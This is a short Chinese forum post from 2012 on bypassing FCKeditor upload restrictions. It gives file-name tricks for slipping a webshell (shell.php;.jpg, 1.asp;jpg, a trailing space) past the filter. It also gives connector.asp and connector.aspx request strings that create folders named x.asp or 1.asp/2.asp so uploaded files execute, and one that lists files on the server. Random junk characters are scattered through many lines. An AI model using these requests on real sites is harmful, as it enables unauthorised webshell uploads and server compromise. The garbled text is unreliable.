很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
. }/ r# [: D B; f, n* _5 t/ p% v1 ~
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
/ o6 k/ L' x* m% e" B; V2 x" c8 G) t
! o5 [5 T% ]/ u" r4 ^. ^- M A继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
* s& p. }/ N. R5 x7 N# |% {% o9 u5 y8 v" B" t* f/ c
突破建立文件夹:- y4 t$ S |% E0 v1 R. P3 f5 S
5 D% x7 b1 Q9 N" I l
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp. I0 j7 Z1 [0 J* c A4 p
" E; S l* I: R1 d( l- `- \, |
参数:
1 r( G, v- d- @. K& d' _4 e* _
2 o5 l+ _1 m( i( M2 g当前目录名:CurrentFolder=/qing.asp) `+ F+ O2 W7 `' Y- Z
; U& L# t. d" Z7 u* ^1 i
新的目录名:NewFolderName=x.asp
9 k( t% f* _: b6 S* j# Z. h5 c* w3 l8 \# v
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……8 X; j" c7 `. l7 H6 q" U& W
# L+ I. W) E2 j' ?; S那么 x.asp 就已经建立生成了,此方法百试百灵!
2 X2 y: u; g8 _
6 ?, V% p* A4 w0 h# W3 j" V0 X新建文件夹参数 x.asp,基本都能搞定。" L- Y; m! s+ ^/ C& l
/ a/ U2 t4 O+ P( n
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建4 o2 O9 o! R4 s/ E" \. P C- l
3 q( e( a, h( `0 c0 Haspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp, P% u5 X/ J0 @* B. W1 y9 Z0 ^
6 D: q7 i C6 ^( q+ h) {获取文件列表8 O- x! Q' o& q. Z
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
, `, Y0 Q0 q* Z' Q! `- A; ~( i
% i8 z) K) @5 t$ g; F |
发表于 2012-12-31 09:27:09
收藏
支持
反对